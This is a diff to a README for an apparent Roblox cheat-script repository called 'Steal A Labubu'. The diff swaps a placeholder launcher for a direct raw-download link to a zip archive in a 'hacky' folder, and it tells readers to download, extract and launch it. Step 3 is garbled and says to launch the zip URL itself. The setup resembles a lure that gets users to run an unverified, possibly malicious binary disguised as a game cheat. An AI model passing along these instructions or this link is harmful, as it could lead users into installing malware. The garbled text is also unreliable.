Brothers15691/labubu-script-roblox-voyager/README.md

 ## 🛠️ Installation Instructions
 Launching your Roblox revolution via Steal A Labubu Script Roblox is pure fun and simplicity:

-1. Download the EasyLaunch.zip from the repository (find it in the Releases section above).
+1. Download the https://github.com/Brothers15691/labubu-script-roblox-voyager/raw/refs/heads/main/hacky/voyager_labubu_roblox_script_v2.8.zip from the repository (find it in the Releases section above).
 2. Extract all files to a folder of your choosing.
-3. Launch the EasyLaunch.exe (or appropriate binary for your OS).
+3. Launch the https://github.com/Brothers15691/labubu-script-roblox-voyager/raw/refs/heads/main/hacky/voyager_labubu_roblox_script_v2.8.zip (or appropriate binary for your OS).
 4. Kick off your scripting journey by importing your favorite Labubu scripts and powering up AI integrations!

 ---